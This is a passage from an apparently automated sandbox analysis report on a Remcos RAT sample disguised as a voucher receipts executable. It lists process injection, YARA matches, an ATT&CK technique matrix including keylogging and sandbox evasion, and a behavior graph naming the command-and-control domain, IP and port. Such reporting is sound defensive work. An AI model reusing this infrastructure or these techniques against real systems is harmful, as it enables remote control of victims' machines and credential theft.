            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`&
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru&T
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ&p
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerInstallingode
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerGT
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr&]
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:&
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3&
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG&F
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN&y
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405BB5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,2_2_00405BB5

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		212
            Process Injection            		2
            Masquerading            		11
            Input Capture            		31
            Security Software Discovery            		Remote Services11
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		2
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		212
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Clipboard Data            		1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            File and Directory Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637330 Sample: Bina Tegas Sdn Bhd Voucher ... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 32 msi25.dynnamn.ru 2->32 34 www.dropbox.com 2->34 36 4 other IPs or domains 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 7 Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe 1 40 2->7         started        11 Udarter.exe 22 2->11         started        signatures3 process4 file5 24 C:\Users\user\AppData\Roaming\...\Udarter.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\System.dll, PE32 7->26 dropped 52 Writes to foreign memory regions 7->52 54 Creates a thread in another existing process (thread injection) 7->54 13 IMCCPHR.exe 5 16 7->13         started        18 IMCCPHR.exe 7->18         started        20 IMCCPHR.exe 7->20         started        22 IMCCPHR.exe 7->22         started        28 C:\Users\user\AppData\Local\...\System.dll, PE32 11->28 dropped 56 Antivirus detection for dropped file 11->56 58 Multi AV Scanner detection for dropped file 11->58 signatures6 process7 dnsIp8 38 msi25.dynnamn.ru 103.47.146.161, 3219, 49757 AS45671-NET-AUWholesaleServicesProviderAU Pakistan 13->38 40 edge-block-www-env.dropbox-dns.com 162.125.66.15, 443, 49756 DROPBOXUS United States 13->40 42 2 other IPs or domains 13->42 30 C:\Users\user\AppData\Roaming\...\logs.dat, data 13->30 dropped 60 Installs a global keyboard hook 13->60 62 Tries to detect virtualization through RDTSC time measurements 18->62 64 Switches to a custom stack to bypass stack traces 18->64 file9 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.